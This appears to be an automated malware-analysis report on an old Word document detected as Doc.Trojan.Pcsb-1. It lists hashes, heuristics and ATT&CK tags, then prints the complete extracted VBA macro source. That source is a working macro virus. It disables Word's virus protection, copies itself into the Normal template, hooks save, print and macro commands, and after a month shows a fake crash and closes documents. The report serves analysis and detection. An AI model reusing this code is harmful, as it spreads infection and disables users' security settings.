Office (OLE) malware analysis — malicious · a170a8d89df4c2a4

MALICIOUS

Office (OLE)

50.5 KB Created: 2001-12-03 14:24:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 73dc2c9a8a300c9e0b2882ebd8dea04b SHA-1: 8fc4f5f8e62bfddd41a97cbf9f4ba186dd930681 SHA-256: a170a8d89df4c2a4e72358f25878cddf14cc67469c762658fe6f309f9d70ec2f

260 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing legacy WordBasic and VBA macros. The AutoOpen macro attempts to export itself as 'PCSB.inf' to 'C:\windows\' and writes the current date to 'C:\windows\Dte.inf', likely for persistence or tracking. The macro also attempts to disable macro security and save the infected template, indicating a downloader or dropper functionality.

Heuristics 5

ClamAV: Doc.Trojan.Pcsb-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Pcsb-1
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 51,712 bytes but its declared streams total only 29,051 bytes — 22,661 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3988 bytes
SHA-256: `60be9847cb2078b5e45a713d869268bccdf1383691d6dd899455614ffa53c4e5`
Detection ClamAV: Doc.Trojan.Pcsb-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NEWVIR" Sub NEWVIR() On Error Resume Next ' Поздравляю, если Вы здесь, ' значит еще что-то можете, ' так что дерзайте, Вас оценили ... ' С уважением АВТОР ' ************************************** 'Отключение чего надо ... Options.ConfirmConversions = Not (True) Options.VirusProtection = Not (True) Options.SaveNormalPrompt = Not (True) 'сохранение тела куда надо ... ActiveDocument.VBProject.VBComponents("NEWVIR").Export "C:\windows\PCSB.inf" ActiveDocument.ReadOnlyRecommended = Not (True) ' Если шаблон не инфицирован, запомнить дату заражения куда надо ... If NormalTemplate.VBProject.VBComponents.Item("NEWVIR").Name <> "NEWVIR" Then Open "C:\windows\Dte.inf" For Output As #1 Print #1, CDbl(Date) Close #1 End If Call Pig ' Оставление комментария куда надо ActiveDocument.Comments.Add Range, "Работать надо в рабочее время. Барик !!!" ' Проверка чего надо, дабы не помереть и размножиться Dim ob1, ob2, sss As String ob1 = NormalTemplate.VBProject.VBComponents.Item("NEWVIR").Name ob2 = ActiveDocument.VBProject.VBComponents.Item("NEWVIR").Name If ob1 <> "NEWVIR" Then var1 = True If ob2 <> "NEWVIR" Then var2 = True ' На этих строка я очень долго трахался с антивирусом ' пока не добавил переменную для обмана If var1 = True And var2 = False Then Set Var3 = NormalTemplate.VBProject.VBComponents sss = "Пустышка" If var1 = False And var2 = True Then Set Var3 = ActiveDocument.VBProject.VBComponents sss = sss + " для антивируса" If var2 = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save Var3.import "C:\windows\PCSB.inf" ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument ' А вы говорите цацки-пецки ' Ожидайте новый релиз !!! ' Мы еще повоюем ... End Sub Public Sub Pig() ' Чтение даты заражения откуда надо Open "C:\windows\Dte.inf" For Input As #1 Input #1, KontrDate Close #1 ' Если со времени заражения прошел месяц, активировать вирус If Abs(CDbl(Date) - KontrDate) >= 30 Then If Time >= "18:00:00" Or Time >= "8:00:00" Then ' Работать надо в рабочее время !!! ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument Call HelpAbout End If End If End Sub Public Sub AutoOpen() Call NEWVIR End Sub Sub HelpAbout() On Error Resume Next MsgBox "Программа выполнила недопустимую функцию, документ вызвавший збой системы будет закрыт. Если эта ошибка будет возникать в дальнейшем, обратитесь к разработчику.", vbCritical ActiveDocument.Close End Sub Sub FileSave() On Error Resume Next Call NEWVIR ActiveDocument.Save End Sub Sub FileSaveAs() On Error Resume Next Dialogs(wdDialogFileSaveAs).Show Call NEWVIR End Sub Sub FilePrint() Dialogs(wdDialogFilePrint).Show Call NEWVIR End Sub Sub FilePrintDefault() Call NEWVIR End Sub Sub ToolsMacro() On Error Resume Next Call NEWVIR End Sub Sub FileTemplates() On Error Resume Next Call NEWVIR End Sub Sub ViewVBCode() On Error Resume Next Call NEWVIR End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.